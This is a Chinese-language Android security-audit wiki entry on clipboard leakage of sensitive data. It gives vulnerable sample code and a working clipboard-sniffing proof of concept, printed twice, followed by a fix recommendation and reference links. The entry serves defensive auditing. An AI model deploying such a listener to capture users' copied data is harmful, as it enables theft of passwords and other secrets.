WIKI

12.2 剪贴板敏感信息泄露风险检测

(1)描述

由于Android剪贴板的内容向任何权限的app开放,很容易就被嗅探泄密。同一部手机中安装的其他app,甚至是一些权限不高的app,都可以通过剪贴板功能获取剪贴板中的敏感信息。

(2)风险等级

提示

(3)影响范围

所有

(4)检测方法

检测类型:手动

漏洞代码:

clipBtn = (Button) findViewById(R.id.btn_clip);

        clipBtn.setOnClickListener(new OnClickListener() {

 

            @Override

            public void onClick(View v) {

                ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);

                ClipData clip1 = ClipData.newPlainText("label","password=123456");

                clipboard.setPrimaryClip(clip1);

 

            }

 

        });

漏洞利用代码:

文本框: public class MainActivity extends Activity {

	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.activity_main);

		ClipboardManager clipBoard = (ClipboardManager)getSystemService(CLIPBOARD_SERVICE);
		clipBoard.addPrimaryClipChangedListener( new ClipboardListener() );
	}

	private void attack() {
		ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
		ClipData cd2 = cm.getPrimaryClip();
		String clipText = cd2.getItemAt(0).getText().toString();
//		Log.v("clipboard", "Attacked: " + clipText);
		Toast.makeText(getApplicationContext(), "Attacked: " + clipText, Toast.LENGTH_LONG).show();
	}
	
	class ClipboardListener implements ClipboardManager.OnPrimaryClipChangedListener {
		
	   public void onPrimaryClipChanged() {
		   attack();
	   }
	}
	
}

(4)漏洞利用

文本框: public class MainActivity extends Activity {

	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.activity_main);

		ClipboardManager clipBoard = (ClipboardManager)getSystemService(CLIPBOARD_SERVICE);
		clipBoard.addPrimaryClipChangedListener( new ClipboardListener() );
	}

	private void attack() {
		ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
		ClipData cd2 = cm.getPrimaryClip();
		String clipText = cd2.getItemAt(0).getText().toString();
//		Log.v("clipboard", "Attacked: " + clipText);
		Toast.makeText(getApplicationContext(), "Attacked: " + clipText, Toast.LENGTH_LONG).show();
	}
	
	class ClipboardListener implements ClipboardManager.OnPrimaryClipChangedListener {
		
	   public void onPrimaryClipChanged() {
		   attack();
	   }
	}
	
}

(5)修复建议

避免使用剪贴板敏文存储敏感信息或进行加密

(6)参考案例

http://www.wooyun.org/bugs/wooyun-2016-0223237

(7)参考资料

http://wolfeye.baidu.com/blog/clipboard-leak/

http://developer.android.com/reference/android/text/ClipboardManager.html